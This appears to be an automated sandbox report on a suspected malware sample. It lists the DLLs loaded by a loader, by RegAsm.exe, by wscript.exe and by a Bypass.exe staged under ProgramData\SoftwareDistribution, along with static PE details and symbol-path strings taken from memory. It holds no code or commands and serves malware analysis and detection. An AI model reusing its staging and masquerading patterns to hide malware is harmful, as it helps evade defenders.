Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: version.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: wldp.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: profapi.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: amsi.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: userenv.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: rasman.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: winmm.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: winmmbase.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: mmdevapi.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: devobj.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: ksuser.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: avrt.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: audioses.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: powrprof.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: umpdc.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: msacm32.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: midimap.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: secur32.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: schannel.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: edputil.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: windowscodecs.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: bFZYRLnRIz.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: bFZYRLnRIz.exe

Static file information: File size 1939559 > 1048576

Source: bFZYRLnRIz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: bFZYRLnRIz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: bFZYRLnRIz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: bFZYRLnRIz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: bFZYRLnRIz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: bFZYRLnRIz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: bFZYRLnRIz.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: bFZYRLnRIz.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ~C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: }C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: krnlmp.pdb\\ source: Bypass.exe, 0000000F.00000002.4223150411.000000001BBCF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.000000000490D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: lC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: xC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
